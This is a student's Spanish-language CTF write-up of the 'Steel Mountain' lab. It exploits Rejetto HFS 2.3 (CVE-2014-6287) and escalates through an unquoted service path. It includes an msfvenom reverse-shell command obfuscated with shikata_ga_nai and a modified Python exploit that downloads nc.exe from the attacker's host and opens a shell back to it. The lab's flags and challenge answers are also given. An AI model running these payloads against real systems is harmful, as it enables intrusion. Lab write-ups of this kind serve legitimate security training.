Informe de análisis de vulnerabilidades, explotación y resultados del reto

STEEL-MOUNTAIN.
Código de Nivel de
Fecha Emisión Fecha Revisión Versión
documento Confidencialidad

xx/xx/2024 05/05/2024 1.0 MQ-HM-STEEL- RESTRINGIDO

MOUNTAIN

Informe de análisis de vulnerabilidades,

explotación y resultados del reto STEEL-MOUNTAIN.

N.5- MQ-HM-STEEL-
MOUNTAIN

Generado por:

. Fecha de creación:
Estudiante HM [Link].2024
Índice

1. Reconocimiento ............................................................................................... 3
2. Análisis de vulnerabilidades/debilidades ......................................................... 4
3. Explotación...................................................................................................... 5
3.1. Método Manual ..................................................................................................... 5
3.2. Método Automático ............................................................................................... 5
4. Post explotación .............................................................................................. 6
5. Escalación de privilegios si/no ......................................................................... 7
6.1. Respuesta desafío .................................................................................................. 9
7. Herramientas usadas ....................................................................................... 9
8. Conclusiones y Recomendaciones .................................................................... 9
9. EXTRA............................................................................................................ 10
9.1. Cargado de archivo de powerUp.ps1 .................................................................... 10
9.2. MSFvenom con Shigata_ga_nai ............................................................................ 11
9.3. Modificación Script Python ................................................................................... 11

***** SOLO PARA USO EDUCATIVO*****

N.5- MQ-HM-STEEL-MOUNTAIN
pág. 2
1. Reconocimiento
Se ejecuta el inicio de la maquina y se deja evidencia la ip que escanearemos , esto es para
saber cuál es la maquina objetivo(Steel Mountain) [Link].

Se ingresa la IP al script para realizar de forma automatizada el escaneo con nmap y el

comando que se invocó es sudo nmap -sS -p- -vvv --min-rate 6000 -oA steel [Link]
Luego de resultado del escaneo, me indica los siguientes puertos abiertos:

Posteriormente, decido realizar de manera automatizada el siguiente comando para escanear

con mayor detalle los servicios que encontramos previamente sudo nmap -sV -sC -p
80,135,139,445,3389,5985,8080,47001,49152,49153,49154,49155,49156,49169,49170 -v -n -O
-A -oA open_ports [Link].

Algo bien interesante a destacar es que detecta que es un

Microsoft Windows Server 2008 R2 - 2012 microsoft-ds. Algo que hemos descubierto que al

***** SOLO PARA USO EDUCATIVO*****

N.5- MQ-HM-STEEL-MOUNTAIN
pág. 3
realizar un ping este tiene como resultado un ttl de 125; algo poco usual y de acuerdo con
investigaciones, es por cada salto para llegar a su destino decrementa el ttl en 1 y para este
caso fueron 3.
IP [Link]
Sistema Operativo Microsoft Windows Server 2012 R2
Datacenter
Puertos/Servicios 80 http Microsoft IIS v 8.5
135 msrpc
139 netbios-ssn
445 microsoft-ds
3389 ms-wbt-server
5985 wsman Microsoft HTTPAIP v2.0
8080 http-proxy HTTP File Server v2.3
47001 winrm Microsoft HTTPAIP v2.0

Empezamos a investigar en el servidor, como comentaba previamente encontramos el inicio

de página por el puerto 80 y notamos que esta publicada la imagen del empleado del mes.

2. Análisis de vulnerabilidades/debilidades
Se detectan con el análisis de vulnerabilidades 2 puertos a resaltar que son el 8080 y el 3389
con posibles importantes debilidades que son de categoría alta y media en la máquina objetivo.
Continuando con el descubrimiento, se realiza el escaneo de vulnerabilidades con el siguiente
comando, sudo nmap -sV --script vuln -p 80,135,139,445,3389,5985,8080,47001 -v -n -oA
all_vuln [Link]

Se realiza el primer fuzzing hacia la maquina objetivo gobuster dir -t 200 -u [Link]
-w /usr/share/wordlists/dirbuster/[Link] -re. Somo me arrojo que
están los directorios de img y al intercambiar me encontré con la imagen del empleado del mes.

***** SOLO PARA USO EDUCATIVO*****

N.5- MQ-HM-STEEL-MOUNTAIN
pág. 4
 • [Link]
• [Link]
• [Link]
Se encuentra en el puerto 8080 el HFS activo.

Puerto Vulnerabilidad
8080 HSF server es vulnerable a un RCE(Remote Command
Execution).
3389 Posible vulnerabilidad de RDP además de que se
encontró pésima configuración suite de cifrados
8080 Pésima configuración de seguridad en el http header

3. Explotación
3.1. Método Manual
Se realiza la búsqueda en searchsploit por el RCE detectado en el scan de vulnerabilidades,
y se descarga el sploit [Link] el cual explota una vulnerabilidad obteniendo una ejecución
de comandos remotos en la maquina objetivo para el servicio Rejetto HTTP File Server v 2.3. En
el extra se verá una modificación al script por problemas en el uso de Python3

3.2. Método Automático

Buscamos en metasploit la existencia de un sploit para HFS version 2.3

***** SOLO PARA USO EDUCATIVO*****

N.5- MQ-HM-STEEL-MOUNTAIN
pág. 5
Lo configuramos con los datos de la maquina y procedemos a correr el sploit

4. Post explotación
Ahora que estamos dentro empezamos la búsqueda de más información. En este caso
sacamos finalmente que maquina es la que estamos revisando:

Nos movemos primero a la raíz cd \ y posteriormente cd \Users\bill\Desktop a la carpeta

de escritorio de Bill y leemos la primera bandera [Link]

Continuamos buscando información importante dentro del servidor y para ello, hemos
dispuesto en nuestro servidor el [Link](corroborada la arquitectura con comando
systeminfo). Encontramos 2 usuarios además del invitado(guest) Administratos y bill. Notamos
además que el administrador debe regularmente cambiar la contraseña.
***** SOLO PARA USO EDUCATIVO*****
N.5- MQ-HM-STEEL-MOUNTAIN
pág. 6
5. Escalación de privilegios si/no
Método de escalada
Se detecta posible vulnerabilidad en un servicio y con el cual nos aprovecharemos para escalar
privilegios AdvancedSystemCareService9(IObit - Advanced SystemCare Service 9)[C:\Program
Files (x86)\IObit\Advanced SystemCare\[Link]] - Auto - Running - No quotes and Space
detected

Generamos nuestro servicio de payload detectado Advanced msfvenom -p

windows/x64/shell_reverse_tcp LHOST=[Link] LPORT=10000 x64/shigata_ga_nai -f
exe -o ~/Desktop/SteelMountain/exploit/[Link] cabe destacar para que pueda pasar
inadvertido, lo ofuscamos con shigata_ga_nai de metasploit-framework

Buscamos el servicio detectado con el comando sc qc

Copiamos el binario con el cual vamos a generar una reverse Shell

Reiniciamos el servicio para que se active el [Link]

***** SOLO PARA USO EDUCATIVO*****

N.5- MQ-HM-STEEL-MOUNTAIN
pág. 7
Esperamos con el netcat en el puerto 10000 y estamos listos.

Nos vamos a buscar la bandera del root que se encuentra en desktop

6. Banderas
[Link] b04763b6fcf51fcd7c13abc7db4fd365
[Link] 9af5f314f57607c00fd09803a587db80

***** SOLO PARA USO EDUCATIVO*****

N.5- MQ-HM-STEEL-MOUNTAIN
pág. 8
 6.1. Respuesta desafío

¿Quién es el empleado del mes? Bill Harper

¿cuál es el otro Puerto corriendo con un web Puerto 8080
server?
¿Cuál es el Servidor de archivos que está Rejetto HTTP File Server
corriendo?
¿Cuál es el CVE detectado en el exploit del servidor? 2014-6287
¿Cuál es la bandera de user? b04763b6fcf51fcd7c13abc7db4
fd365
¿Cuál es el nombre del servicio que pueden AdvancedSystemCareService9
reiniciar y tiene una vulnerabilidad tipo ruta de
servicios sin comillas?
¿Cuál es el comando con el cual podemos Powershell -c Get-service
buscar un servicio en powershell?
¿Cuál es la bandera de root? 9af5f314f57607c00fd09803a587d
b80

7. Herramientas usadas
nmap Herramienta de escáner de un host o ip para saber sobre servicios
abiertos, posibles vulnerabilidades
Nessus essential herramienta que se utiliza para escanear vulnerabilidades
msfvenom herramienta que se utiliza para generar un Shell para realizar
reverse shell
crackmapexec Herramienta de post explotación para realizar movimientos
laterales dentro de una red local
metasploit Framework que ejecuta sploits de manera automatizada.
meterpreter Framework que es parte de metasploit capaz de realizar
ejecuciones remotas de comandos

8. Conclusiones y Recomendaciones
De acuerdo con todo el ejercicio que hemos desarrollado, encontramos que al tener
desactualizados los distintos servicios, esto es un gran peligro dentro de la organización. Lo más
destacable es el puerto 8080 al tener expuesto un servicio que se encuentra desactualizado se
puede vulnerar. Se realizan una serie de puntos a considerar.

Recomendaciones:
1) Hadernizar la máquina para dejar los servicios detenidos y así no tener abiertos puertos
que podamos utilizar de forma maliciosa.
2) Actualizar los servicios desactualizados como lo es el HFS.
3) Actualizar el sistema operativo con los últimos parches de seguridad y que estos puedan
***** SOLO PARA USO EDUCATIVO*****
N.5- MQ-HM-STEEL-MOUNTAIN
pág. 9
 ser compatibles con los softwares o ver la factibilidad de realizar la migración
correspondiente de cada aplicativo que no cuente con Long Support Time (LTS)

9. EXTRA
Herramientas usadas
msfvenom herramienta que se utiliza para generar un Shell para realizar reverse
shell
netcat Genero una conexión escucha desde ma
metasploit Framework que ejecuta sploits de manera automatizada.
meterpreter Framework que es parte de metasploit capaz de realizar
ejecuciones remotas de comandos
9.1. Cargado de archivo de powerUp.ps1
Cargamos el archivo previamente descargado

Cargamos la consola desde meterpreter powershell_shell y nos cambiamos a Desktop de Bill.

Ejecutamos powershell con el archivo para buscar los servicios con el comando Invoke-
AllChecks.

***** SOLO PARA USO EDUCATIVO*****

N.5- MQ-HM-STEEL-MOUNTAIN
pág. 10
 9.2. MSFvenom con Shigata_ga_nai
Generamos nuestro servicio de payload detectado Advanced msfvenom -p
windows/x64/shell_reverse_tcp LHOST=[Link] LPORT=10000 x64/shigata_ga_nai -f
exe -o ~/Desktop/SteelMountain/exploit/[Link] cabe destacar para que pueda pasar
inadvertido, lo ofuscamos con shigata_ga_nai de metasploit-framework

9.3. Modificación Script Python

En este apartado dejo el código fuente. Que he modificado para ejecutar el sploit para obtener
ejecución de comandos remotos. El problema principal, el sploit [Link] está diseñado para
usar una librería disponible en python2 urllib2. Se investiga y se modifica el import de la librería
[Link] disponible en python3 y además se corrige el error de captura en variable vbs; el
cual detectaba el \UXXXXXX y truncaba el binario al momento de ejecutar.
#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: [Link]
# Software Link: [Link]
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287

***** SOLO PARA USO EDUCATIVO*****

N.5- MQ-HM-STEEL-MOUNTAIN
pág. 11
# Description: You can use HFS (HTTP File Server) to send and receive files.
# It's different from classic file sharing because it uses web
technology to be more compatible with today's Internet.
# It also differs from classic web servers because it's very easy
to use and runs "right out-of-the box". Access your remote files, over the
network. It has been successfully tested with Wine under Linux.

#Usage : python [Link] <Target IP address> <Target Port Number>

# READ THIS!!!!!!!
# EDB Note: You need to be using a web server hosting netcat
([Link]
# You may need to run it multiple times for success!

import [Link]
import sys

try:
def script_create():

[Link]("[Link]
+"+save+".}")

def execute_script():

[Link]("[Link]
+"+exe+".}")

def nc_run():

[Link]("[Link]
+"+exe1+".}")

ip_addr = "[Link]" #local IP address

local_port = "443" # Local Port number
vbs =
"C:\\Users\\Public\\[Link]|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createob
ject(%[Link]%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20crea
teobject(%[Link]%22)%0D%[Link]%20%22GET%22%2C%20%22http%3A%2F%
2F"+ip_addr+"%[Link]%22%2C%20False%0D%[Link]%0D%0A%0D%0Awith%20bStrm
%0D%0A%20%20%20%[Link]%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%[Link]%0
D%0A%20%20%20%[Link]%[Link]%0D%0A%20%20%20%[Link]%20%
22C%3A%5CUsers%5CPublic%[Link]%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20w
ith"
save= "save|" + vbs
vbs2 = "[Link]%20C%3A%5CUsers%5CPublic%[Link]"
exe= "exec|"+vbs2
vbs3 = "C%3A%5CUsers%5CPublic%[Link]%20-
e%[Link]%20"+ip_addr+"%20"+local_port
exe1= "exec|"+vbs3
***** SOLO PARA USO EDUCATIVO*****
N.5- MQ-HM-STEEL-MOUNTAIN
pág. 12
 script_create()
execute_script()
nc_run()
except Exception as e:
print ("""[.]Something went wrong..!
Usage is :[.] python [Link] <Target IP address> <Target Port
Number>
Don't forgot to change the Local IP address and Port number on the
script""",
"\nError: ",e)

***** SOLO PARA USO EDUCATIVO*****

N.5- MQ-HM-STEEL-MOUNTAIN
pág. 13